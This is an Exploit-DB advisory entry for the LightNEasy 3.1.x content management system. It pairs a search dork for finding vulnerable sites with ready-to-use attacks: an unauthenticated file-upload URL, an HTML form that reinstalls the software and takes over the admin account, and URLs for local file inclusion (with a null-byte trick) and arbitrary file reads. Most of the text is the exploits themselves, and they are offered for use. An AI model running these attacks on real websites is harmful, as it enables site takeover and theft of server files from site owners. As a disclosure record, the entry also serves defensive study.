LightNEasy 3.1.x Multiple Vulnerabilite



EDB-ID: 12322 CVE: N/A OSVDB-ID: 63992
Author: ITSecTeam Published: 2010-04-21 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##############################################################################
#Title:             LightNEasy 3.1.x Multiple Vulnerabilites                 #
#Vendor:            http://lightneasy.org/                                   #
#Dork:              "Powered by LightNEasy"                                  #
##############################################################################
#AUTHOR:            ITSecTeam                                                #
#Email:             Bug@ITSecTeam.com                                        #
#Website:           http://www.itsecteam.com                                 #
#Forum :            http://forum.ITSecTeam.com                               #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability46.htm #
#Thanks:            r3dm0v3 [r3dm0v3_at_ymail.com]                           #
##############################################################################

#DESCRIPTION (by vendor):#####################################################
 LightNEasy, a simple and light Content Management System and Website Builder


#1-fckeditor Remote File Upload###############################################
 #Desc:
 Remote users can upload file without authentication.

 #POC:
 http://site.com/fckeditor/editor/filemanager/connectors/test.html


#2-Reinstallation#############################################################
 #Desc:
  After software installation it is still possible for remote users to reinstall
  the software without authentication.

 #Exploit:
  <html>
  <form name="form1" action="http://site.com/LightNEasy/install1.php" method="post"><table>
  <tr><td>Enter password:</td><td><input type="password" name="password" value="" /></td></tr>
  <tr><td>Repeat password:</td><td><input type="password" name="password1" value="" /></td></tr>
  <tr><td>Admin name:</td><td><input type="text" name="admin" value="" /></td></tr>
  <tr><td>Admin email:</td><td><input type="text" name="email" value="" /></td></tr>
  <tr><td>Website email:</td><td><input type="text" name="wemail" value="" /></td></tr>
  <tr><td>Tables prefix:</td><td><input type="text" name="prefix" value="LNE_" /></td></tr>
  <tr><td>Database system:</td><td><select name="database" ><option value="SQLite2">SQLite 2 (following fields empty)</option><option value="SQLite3">SQLite 3 (following fields empty)</option><option value="MySQL">MySQL</option></select></td></tr>
  <tr><td>Database name:</td><td><input type="text" name="databasename" value="" /></td></tr>
  <tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
  <tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
  <tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
  <tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
  </table></form>
  </html>


#3-Filemanager plugin Local File Inclusion####################################
 #Bug-file: /plugins/filemanager/get_file.php
   29:  if(!isset($language)) $language = 'en';
   30:  include("languages/lang_$language.inc"); //<---- vulnerable line!

 #Exploit:
  http://site.com/plugins/filemanager/get_file.php?language=[file_to_include]%00


#4-Filemanager plugin Local File Disclosure###################################
 #Bug-File:
   14:  if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
   ...
   56:  readfile($file);

 #EXPLOIT:
  http://site.com/plugins/filemanager/get_file.php?file=[file_to_read]